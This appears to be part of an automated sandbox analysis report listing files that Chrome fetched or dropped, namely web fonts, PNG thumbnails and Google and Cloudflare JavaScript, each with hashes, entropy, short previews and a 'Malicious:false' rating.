                                                                                                                                                                                                                                        SHA-512:3510CF6C3ED3786716329466F5575F63563B6C0DFEC2F78E3CA8C881F6C17EC066AC21EDDA970ACB377E610F1A5C937D9CBBE38DC690A30F12FEF49EDD93189D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/caveat/v18/WnznHAc5bAfYB2QRah7pcpNvOx-pjfJ9SIc.woff2
                                                                                                                                                                                                                                        Preview:wOF2..................0..........................<...8..2.`?STAT...P.....D..).....6.$.... ..~.....[..r...GE3n...g.T....&..^Z........Q'..#.Q...u.....+...U6L..$!P.co......4w...rIQs.'.nXX9....@...N.W.....X...Z6SI.(.........I...zC.H.U.[.M."............\.....w.N....Q.w...L-zGg%..S.....Bcwq!].z.H..V..T........w...7...jE1.:.zR.U-.....f.e.'._9.y".$"#.(...M...=....[t.X..Rv..1.>..g.o.P.?..q ....4RsP..I..?........].Oq..k .q...PJ.ii..}?.W.r.BA.Y_.M..........$,.Nd.:.'..r..(.q:/i.e..C.......:...kq.....8.}.8.S53..=&6...+..Y.YY.......o.>....s..x"5X......z...'h.D8<N .E....s....v...hh+........RE..5....D^.....i.i\.f....*......~.xJs....n......Gl......%..X.L.VW.1.A*.........Us...xp.G.^4.J.... ......#b..=uF..\Z.F....[x".y{....g..>..Z1....*`....;<.?.~'.ui.q.z.0...Nz...9.l....h...Qa....|........R.RjZ7..2h...g.T..Z.U./.....nCj/._..Z...... 1. ...H...&%......es!tbf..\.....h.k.|......=...1...,.sxI....dcW./k...o....._...{k.N.....:.`.*?......`..T.K..k.._.. ...D.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:1
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55678
                                                                                                                                                                                                                                        Entropy (8bit):7.971857120673013
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:+VNce7AVhdSHiNTK1JyuyQtBkNBeGSDYqWjqFwCtm:+VNcesMeK/bKKDoqOCtm
                                                                                                                                                                                                                                        MD5:421BAE511B172E6D4B6C11CBFE93BE48
                                                                                                                                                                                                                                        SHA1:EBC4F49C015D4BB3D697D20BFC24CEB291C89A6D
                                                                                                                                                                                                                                        SHA-256:B382AD6D1BBF687024711C529CDB1486A7C87B1284E7D4EF545FD8DE93FF84B7
                                                                                                                                                                                                                                        SHA-512:3FF79D88F030DE4E957E73128119419AEC3F645A0A26C17766BAA87ADF1F184A8173304F330E3A176323D6BB5B6FBAF70CC72A7BF8E1870F7D4125BF152FE81B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(...EIDATx...1..0....@.+......0..;.....}.O../,...D\(.... ,.a........a...@X..... ,@X..... .....@X..... ,@X..... ,.a............@X..... ,@X......6.C.a.V.1..y._l..j1Fa=p]W.M.T>Y.%..( ..}...KX ...SJ.j ,..m]Wa.......<..@X ..8.9.ga....6l())qvv......www....c....Q...<x....$I..$$...$. ._ ...J(...T.ID@.)..RA.IT..U....:H..=;wwv...).J......d..v.]......-.K..h4......vK...u.P.%.Z..r.l6..\.\....cX.V+......@.~.B..l.F..N............l..P4...s..&.j..D"..~:.....V*..L&s8....~O.6.."..N.....|.^...F.....?..v....5....H$F.1.LN.S.SH.W.~._.._.X.AK$....1....cX.r......<.q/'..V...^.w.......u.z.NbR...j...2@L.J.J..aA.v..2..h........:...X..'...l6...A.P.............o..pM.aAi.@.&....N.....j.Jv..Jpd,........y.......z"P...F..B!2-..u.T]...x...A..P*../.V....<L+..>.jX...5..f.R).03,l]U*....... ..#.ct.N..%...zB.6..6.t.!'..x.|..........8n._..|d..b!.&_.n2.H.4.+y<....<....d.a..s.X..o....A....}..@@......DI.$Q.. . @ !.$....U.D...e...=...r...........b....|<|...O.../.LF
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (48238)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):48239
                                                                                                                                                                                                                                        Entropy (8bit):5.343270713163753
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:+CbPzHMb42QOna0rhgaqC2DdONTjwzsLSh0ZsC3Y2zIijkKY1LBep7iFFQ7Srv3h:gb425na0rhgaqDnzs22z3kH
                                                                                                                                                                                                                                        MD5:184E29DE57C67BC329C650F294847C16
                                                                                                                                                                                                                                        SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                                                                                                                                                                                                                        SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                                                                                                                                                                                                                        SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                                                                                                                                                                                                                        Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 2560, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):2560
                                                                                                                                                                                                                                        Entropy (8bit):7.866416223385858
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:vsV74S5ahyIWiGdLsQG9/UstEqFvtUYdaxqn78LTxbnBMUFWqeX0uGh:vY4at4Gurk+vtBdak7cTvVF7eXg
                                                                                                                                                                                                                                        MD5:AAD954B1FF4E297C5D137133C4BB36C3
                                                                                                                                                                                                                                        SHA1:781A7FFB51D787FA807F1D861A4D003BD33E42E8
                                                                                                                                                                                                                                        SHA-256:C28A9A498502C596ED0275021BDAEF2A57225D9460C650706907FC95F7BA6D80
                                                                                                                                                                                                                                        SHA-512:149F0D8CC70A8D6D3567917DA7F43D125BAB19D1B420E6921C38E278196E168E3D3FAB6C2C3608ACBDA01F0A660267B35A5672DF80CC671B3167A4CCE4DE6D9F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/ebgaramond/v30/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-6_RkAo9_.woff2
                                                                                                                                                                                                                                        Preview:wOF2...............$................................ ...`?STATH.......L.s."..6.$.>. ..h.c.....(...v..I....y~...KxD=....XL.#...Hc..?.....{.............vgz..E..\.O.(.@..,..........FD5DHW:.....3a1.L...M.C..7Dj`(.\....\D.q..<o...............).>.......-....m.....;.......@..C5.@].9.6..J....}o.........T..F..%$.08.G....g..M..(.|..Y..(.R .R...9.{aK.`.b/h.f?C/K..9.|..M`.O...b..i.}....s......O.;.....7.!........Ep.Xx.....#tl......c...>v...1.E#]..k...j.aLK4,.n[.......>..U(c.'..K .....g1..l=.. ....&.9Z..".r..P!.K.....I.I..J..)W.p..+..:....u]A.FGG.{..:e..)w....%...Zt5n...G..;...5!......0...0.`....(....R.bQ...o..l...m].._L...fp.Lp].=..v.u.k]6y..+`...V..k...9:.e....c...c..v..oC.(_....F|.&..e.ny....(....V&....s6..I..VR...RW.*k.P5j...^R{.r....`]Z..Iij^;.C.QCO..4.a$'.w.HC...E...{....i...2.....K5y.j.....v.#%..n.3...y.o_..:.:....c]......;E\.k...v..AI...r"..1.3.~'..T..{=...N..amh.S...1.."H-.8..bl...U..Wz.<..Vr..gi._..cwB..8.k..~...{.+xx3....C.^...)..k.Kz...lr^
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4219)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):120543
                                                                                                                                                                                                                                        Entropy (8bit):5.475551581614068
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:lhjbUsBO/MMbWk+MqY0nVKe1dpo65h5p/i1+o3+cCRv52YSNeyjmFX/pmbUF9sQI:7jgs+MVzJKeKMRdbcCR1PF9sQ2l8+
                                                                                                                                                                                                                                        MD5:DB1D9C6D2A8118F10F261F72A84B8D71
                                                                                                                                                                                                                                        SHA1:4BA867EDB7742FE524CF001BEFFAAA4F0ACC71FC
                                                                                                                                                                                                                                        SHA-256:7A51C23ACCA1996574BE67C22902100EFF6BBE64AC3522FBD9558F4E7D39D5BA
                                                                                                                                                                                                                                        SHA-512:4F4A6659040FE37E06FB4895814A67F86DB398A6A0CED03C8187B02541BE9348AD8FA7DCB20C40BE47CF12E4F0F277557742AF738F559CEC72AFDB51C5D2BD7D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:(function(){var m,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},da=ca(this),u=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.u("Symbol",function(a){if(a)return a;var b=function(f,g){this.$jscomp$symbol$id_=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.$jscomp$symbol$id_};var c="jscomp_symbol_"+(Math.rand
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1120)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):208226
                                                                                                                                                                                                                                        Entropy (8bit):5.5259538137819915
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:pK/Vc8GlWWhNiEmnGTOXwqLXZT6uCnL5EQZpyuSTsO9qi0pMRwa/lLPPBmXf:pGc8aKB7ZT6KiSTsO9j79LPPBmXf
                                                                                                                                                                                                                                        MD5:85C605284CA07CABD2C47F811436A39C
                                                                                                                                                                                                                                        SHA1:EF502DB811F14EE3734B0A374E20ACD5F8144529
                                                                                                                                                                                                                                        SHA-256:D2D6FB9D2621B39CD53FE8459C144246E89D76EBE8211A72C7877AAB3F88B03F
                                                                                                                                                                                                                                        SHA-512:E31E02ADDD48BEED8FA5EBC94DE8047D4BE28409B43BC2F7A369F0B2BB5B851CB69730AD3929E23F46546974DE15C0C1217BAC35F5C4CAA0DB36ED4190BA465F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:gapi.loaded_1(function(_){var window=this;._.ug=(window.gapi||{}).load;._.Qn=_.ve(_.Ge,"rw",_.we());.var Rn=function(a,b){(a=_.Qn[a])&&a.state<b&&(a.state=b)};var Sn=function(a){a=(a=_.Qn[a])?a.oid:void 0;if(a){var b=_.re.getElementById(a);b&&b.parentNode.removeChild(b);delete _.Qn[a];Sn(a)}};_.Tn=function(a){a=a.container;typeof a==="string"&&(a=document.getElementById(a));return a};_.Un=function(a){var b=a.clientWidth;return"position:absolute;top:-10000px;width:"+(b?b+"px":a.style.width||"300px")+";margin:0px;border-style:none;"};._.Vn=function(a,b){var c={},d=a.xc(),e=b&&b.width,f=b&&b.height,h=b&&b.verticalAlign;h&&(c.verticalAlign=h);e||(e=d.width||a.width);f||(f=d.height||a.height);d.width=c.width=e;d.height=c.height=f;d=a.getIframeEl();e=a.getId();Rn(e,2);a:{e=a.getSiteEl();c=c||{};var k;if(_.Ge.oa&&(k=d.id)){f=(f=_.Qn[k])?f.state:void 0;if(f===1||f===4)break a;Sn(k)}(f=e.nextSibling)&&f.dataset&&f.dataset.gapistub&&(e.parentNode.removeChild(f),e.style.cssText="");f=c.width;h=c.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (762)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2627148
                                                                                                                                                                                                                                        Entropy (8bit):5.634343393804168
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:gmTLsDwnN6ZS1Y/F3PZ95HXGB+LjkZm8cM1A540xt:gWrbY/VtHXw+XzIE/xt
                                                                                                                                                                                                                                        MD5:8C425EF9E02A9CE4EED19D48AB7B3416
                                                                                                                                                                                                                                        SHA1:E2E8229DF2606A9DC85301539E1D40C61C20EB73
                                                                                                                                                                                                                                        SHA-256:360213251F8F0C199CCA6FB3FD6B12DAF884CB318D4AD57E53DF34A479E5C8C2
                                                                                                                                                                                                                                        SHA-512:D8ADE94A7701D96CBEA2F96BF9D18D1DFC23A402E4CBF8FEC5F5935C327D86F3A9C9082D145C89C17182F769476B9463D1E9A1D7BB7BA1E9011051B2F9B5DE01
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:mK(G1a);.var VPf="\n-------------\n",zN=" - ",WPf=" - 24px)",XPf=' aria-checked="',YPf=' aria-controls="',ZPf=' aria-describedby="',$Pf=' aria-disabled="true"',aQf=" aria-disabled='true'",bQf=' aria-hidden="true"',cQf=' aria-hidden="true"><div jsname="',dQf=" aria-hidden='true'",eQf=" aria-invalid='true'",AN=' aria-label="',BN=' aria-labelledby="',fQf=' aria-valuemin="0" aria-valuemax="1" aria-valuenow="',gQf=" but found ",hQf=" by ",iQf=" characters entered",jQf=" characters remaining",kQf=' checked="',CN=.' class="',lQf=' data-disable-esc-to-close="',mQf=' data-hovercard-id="',nQf=' data-idom-class="',oQf=' data-name="',pQf=' data-progress-announcement="',qQf=' data-provided-aria-labelledby="',rQf=' data-tooltip-classes="',sQf=' data-tooltip-hide-delay-ms="',tQf=' data-tooltip-id="',uQf=' data-tooltip-show-delay-ms="',vQf=' data-tooltip-x-position="',wQf=' data-tooltip-y-position="',xQf=' data-tooltip="',yQf=" data-use-native-focus-logic='true'",zQf=" disabled",AQf=' disabled="',BQf=
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 25940, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):25940
                                                                                                                                                                                                                                        Entropy (8bit):7.990402611464527
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:h/no+9wjpn4U4LdAoKQfezKLBEKk5727+CmJsABNFjN:hvoZjeU4ioPLLGKkJ2l0VZ
                                                                                                                                                                                                                                        MD5:472997FA70DA7203D0AAF11F7B166C93
                                                                                                                                                                                                                                        SHA1:17B746D4980DF5C0EFFCB129B63FFF1FCBDB8999
                                                                                                                                                                                                                                        SHA-256:5110D967DAD4A4E2D1578B5A1E27E210F03DAD636892CEA6D7F8B1BB617BCF2B
                                                                                                                                                                                                                                        SHA-512:6BE9C1998D004BDB1299D23B2BCF3ADEE693893018842E9A5DE2E58B19023CADB16FE9A95F6FEF7DA70AFB203871C6C30E530221FE8E0FEA7AC08E911B34AF23
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lexend/v23/wlptgwvFAVdoq2_F94zlCfv0bz1WCzsW_LU.woff2
                                                                                                                                                                                                                                        Preview:wOF2......eT..........d....................................`?STAT............].....6.$.... .....x.........t*J.U.....@.lW3......G"L:#.......&.9l3O.u`.........CSX5m...i.%W..!...8i...V.I".&V...%J.w..u...6....OU....rLy....c_..t...L(k..z..2.|S...Lu..TK..../u.Y..5.P.>T........BJ,......&.#....T..K..e.5......D..~....'.v_.......g..D;U+.!..i..D.......I.........O&fm...0..*.\...!.2.h..&K....$T-..P.."......R^.xt.<....&y....\...h{b.H.../.2h...."."0n...K..]..=o>.U....RjD..G.[.wI.!..Bh.....@.,..W@.A........Qy..X*.bD....Ry).B@.. t..s.w9....U....(2....e...cc,..l0`..RO...30..........(.....8......Z.=......bo.E..HFa7%M...8U.G.g.Nv...8x.d..`......a...i3..1..Rb.....H..N..l..x`.[..S.B..t....`.g.C..TB!..I.5t*Cix.3.b....e.c..E.Yi.T...7...`......L....!..l.9.O.~...X.XH.;s..^{.o).R .."^..|...R....n:P...:H.v"..+..T.......i...9(...z.`{.. .D..|..^.Z.?..i.T..FO.~../....f.."...IWUd..`....kr].;};...g.b.Q.&+*'....J..f`....Y...6..x.W.~.."..t.K..dd.....m4.!.NH....q.m........^...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):11436
                                                                                                                                                                                                                                        Entropy (8bit):7.883659309949095
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:xaSeSbFYluVySi0KTtiw6fYqfCRtB4+kyM3/5+jcmK9ZHvMDLMP3jKdg0KZHiAQi:xaSBbFYqeH78CF4Si5+ovZwgUvsiAQwp
                                                                                                                                                                                                                                        MD5:6AE698E9FB72F3014D183C64E9AAC871
                                                                                                                                                                                                                                        SHA1:06FEC1A4FAB5CC6C35CA3D2B43B4616CEFBA3A70
                                                                                                                                                                                                                                        SHA-256:9969682C52B0A85BBA70AFA77576F48061EE7B4E5E3F9F82BC45EAA113EDB7C5
                                                                                                                                                                                                                                        SHA-512:3F2DEA8D80555D7C7158686C77297073989A8AEF17BF7965F38FB503E10FFB7C57B467296C4281EF83D2AC9A7E0A13F007375B795BA9A233FC21E1FDBE7F1818
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1FEzH4gxwNMMzfMtamONssYR8DxLln98Ef4q9GwE9UIo_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..,sIDATx.........._5. 4G..Mp....@......0,......`X...`X.a....a...`X......a...`X...`X.a....a...`X......a...`X......a...`X...`X.a....a.....f..[..q....VUU..V[[-.J....D....D ........ ...Y........pg.\.a.....`...c...T.s.S.7.........|.<.].<K.'....X.m......;y..a.P....}..c3`....Z..$.../b..G.N...<J..\o}....c3`.k...nnn..G..q..-..%z.0..c3`.q.K..I!4...\^}$...........u".TW.k}r.,.,y!y.......T.l...............@."K>..".}"jUVVZXX|~T\\.......Qk``.Guvv....-. .....Xl(.'........H$.....`...r........h.....B#"..O...q.B9.....???.Vff&....666......M^QAA.ySJ....K.......JJJz....E:.......drr......C&..........%..q....omm......JKK....Joo...fYY.~'r...K.....255.]C...>>>..Z]].s..............v......;....U....!dww..........,.,.,.&00...faa.5`!.===766Z[[.8==]]]........0xFdjZZZMM.......%............Q<off.'..%$$..0`..XhZyyy.....y{{....z....x.I255.K+((H.................].>$$..g.b...X...&&&...........3`...........b.....Z|...n]..YK.........A."......t.4D.cbll..a.,......
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):110634
                                                                                                                                                                                                                                        Entropy (8bit):7.991726724913241
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:3072:2giLsVuLCrBoIAxSGRpScd6HqU5+owTF2FuEP:2gedLCuFFRpeKQoTkFPP
                                                                                                                                                                                                                                        MD5:C26108F4C7018FF8A764C2C850057AE0
                                                                                                                                                                                                                                        SHA1:D44788425920D5100F09BF6CD0F532A538698CBC
                                                                                                                                                                                                                                        SHA-256:88F1531AE3BD4660AC3AD8D137217CD6B18618B706DE7CBA26005C3A86788CFF
                                                                                                                                                                                                                                        SHA-512:5F798DD0F50FC17ECDBB3D6B3DACA350EC2E2461FA5D525CD7DDB8445D787EA23451B9D90B33A68459EC658873B3592E27BC73F21F5C4069F148224B73D5D8EB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx...... .E..X.eY..X2..F.4....Dx...J........,@....@.....,.....@.....,.......`... X... X.`....`... X......`... X... X.`....`... X.w..._.........,..Ro..... X.`....`... X......`........$.V8.c..;.5.f..m.. 6'.s.......>y....G?{...SU._.u..}..H....]..].i..L...*...nb.].zI.]M.. ....k.^..z.K.jX.I. .V.......,......l.R_W.)...DQ./...{......._.r..@.&.....~......L....k.^1k6IX..z..dH....WK.^.....$.f?..j.Z7.oIHLy.:d..K.B.....n.uj].... A...HX.E.T*k"b...+.Y....7."$. A.O:%.[.T.&.......!5-....g.=>r...?~.....r...k._...x.R .d.e.....A...<z....go?E~....b.o..9s.1..}.....Ph....SR..6KNI.Ab.<.E...|.......H...,.../o>F$$..<.=@....A..O.5..(.......nkbr......qp....>E.F`/...oL1p.tj..O.B/...L.~...%.......(UL..:Z.2k.4....x...w.|{.%F.n..V..r.5......q..L{O...z..^...T...77...3.m....-.AE#d.....e.-.U...J..n..S..^...{...^.....6.W..!......O..u.6.<....d.y..9r.I.u...=. ..j.....K.S#..G.4._*.{wn.tb..G.lv...C.....M...._..4m.P^3...]C...K.]x.9..)f.;.G.~.i
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 84892, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):84892
                                                                                                                                                                                                                                        Entropy (8bit):7.997781229266095
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:HumAnFGBzYl9bxrG05M5ThANEoO4QrLn2da3f6f7kkz5NCuELhJe56NcYhDpI:O7KQxy05WTimoO4QrT2da3fakrG56Nc9
                                                                                                                                                                                                                                        MD5:0F0BE34D30705D3F21ECCBBFBFCBE983
                                                                                                                                                                                                                                        SHA1:96A0C04F6610AE014FC1179641861C1A96DD6DD0
                                                                                                                                                                                                                                        SHA-256:E05FD4C39D2671D0FEBCF551364287A41D4889CA4692817722459FF34940AC81
                                                                                                                                                                                                                                        SHA-512:45B00B7B0962DCB3BE109981A9D41682E36767F9A2056F6751B639B96F97824D59867B7700F61C68BABCF35FC1C4E3719E361B25339C10346CCB12694E1492C9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/pacifico/v22/FwZY7-Qmy14u9lezJ96F.woff2
                                                                                                                                                                                                                                        Preview:wOF2......K........x..K5..........................&...F..(.`..............@..6.. ..6.$..z. ..r.....K[.w.....>..f...G./...=[..l.Awl.e.....m[......p.`.MoL.........d"...Iv.IZ....._ac.6Ls...BWn.Rr&.4.y..]L...i..Ri.$5.>.......W...&./WtpW.I..$!...5.....#.k8.n..e....3...s].f.+.q.~.h..C...rZ..3B...._..d..W..5m.Y..%......H.z.)'M9O.U...yz:.m+-...>....N.:..2...[..nU...<G_z.;;......E.d...J....L1...{.....7..;{....I.K..s...x.JHF..Z@u.l......W.&..dp....#..>/..q&r!..0.0J/.........%.....j...k..].5...QM.O..t...A...m.69p.{..kr........w.v|j...Cf...c\7...DZ.aL...l. .........{_o.6.cA.D.....a...3jb S..#....G.?C.'F7.. .....g........D.K...8...Z.J9D...T.ynU.............i.%Q.....H.1s........=.... *F.T..(........5`."o...0X%.l#6rD..../v.Qo....~....~.!.m..y......g...!. ....pU..t..g..r..t.#1.0D...6...!.z.W6.N..P.$/..9..6.Q......7g....8.#...y.E8..#....?L-.80.B{..O...t..,..[[.E...6Y..T....$[.g...+.KX.. !4.xj.^..e.2+.:*W.wV'.T/Z8..MJ...)M...............>.M.-.|.k{
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (571)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):210705
                                                                                                                                                                                                                                        Entropy (8bit):5.478024371837771
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:bmcIXQWuh5WZbdVavEgsDRzq0bobGzjAhKjt0N59z6PTC9h99o9p+AL7/Uvg2ujO:fIKG3jeKKxsk3E+AL7Src6pJEh+F
                                                                                                                                                                                                                                        MD5:FA037FCDB76C0D1CA9AD1BDA5D5F752D
                                                                                                                                                                                                                                        SHA1:82363C564113C638663BDE3C6895A662A47E76CF
                                                                                                                                                                                                                                        SHA-256:F1392B7F6FF6034D1DE5E86C24EFC1D7D923A4E8DC68C7E44FFF447E109F682A
                                                                                                                                                                                                                                        SHA-512:A810BB85538B5CAD3F0D55DD51C963F7D9D9C445B291EF8DA1F614538F639725F92928DA081323C0FB463D831CC4F9AFA3E2E9F936E808B4BADBC2E7BE208C39
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:"https://contacts.google.com/_/scs/social-static/_/js/k=boq.SocialPeopleHovercardUi.en_US.OTDGvqrbWkA.es5.O/am=AAzwBg/d=1/excm=_b,_tp,hovercardwidget/ed=1/dg=0/wt=2/ujg=1/rs=AGLTcCNnwIImZCMeORfNCH9aep3UU73IjQ/m=_b,_tp"
